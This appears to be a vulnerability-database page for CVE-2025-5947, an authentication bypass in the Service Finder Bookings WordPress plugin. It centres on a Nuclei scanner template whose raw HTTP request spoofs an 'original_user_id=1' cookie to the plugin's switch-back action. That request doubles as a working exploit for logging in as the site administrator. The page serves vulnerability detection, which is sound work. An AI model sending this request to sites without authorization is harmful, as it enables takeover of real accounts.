Service Finder Bookings - Authentication Bypass
CVE-2025-5947
Verified
Description
The Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation vulnerability caused by improper validation of a user cookie in the service_finder_switch_back() function, letting unauthenticated attackers log in as any user, including admins.
Severity: Critical
CVSS Score: 9.8
Exploit Probability: 43%
Affected Product: service-finder-bookings
Published Date: March 23, 2026
Template Author: sedat4ras
CVE-2025-5947.yaml
id: CVE-2025-5947

info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
  description: |
    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
  impact: |
    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
  remediation: |
    Update to the latest version beyond 6.0.
  reference:
    - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
    - https://github.com/M4rgs/CVE-2025-5947_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-5947
    epss-score: 0.43227
    epss-percentile: 0.97553
    cwe-id: CWE-639
  metadata:
    max-request: 2
    vendor: sf-booking
    product: service-finder-bookings
    publicwww-query: "/wp-content/plugins/sf-booking/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
        Host: {{Hostname}}
        Cookie: original_user_id=1

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*\/wp-admin\/'

      - type: regex
        part: header
        regex:
          - '(?i)Set-Cookie:.*wordpress_logged_in_'

      - type: status
        status:
          - 301
          - 302
# digest: 4a0a00473045022031f97168bd90c6ac23e1fd85ea8617027e6a7bbec69a900dbfbff46f4bcafe1e022100f92275f48d5d33d3ef4599904301ee4233ba8c9dacc70d8a8f0358921fb5496e:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-5947
CWE ID: CWE-639
References
https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
https://github.com/M4rgs/CVE-2025-5947_Exploit
https://nvd.nist.gov/vuln/detail/CVE-2025-5947
Remediation Steps
Update to the latest version beyond 6.0.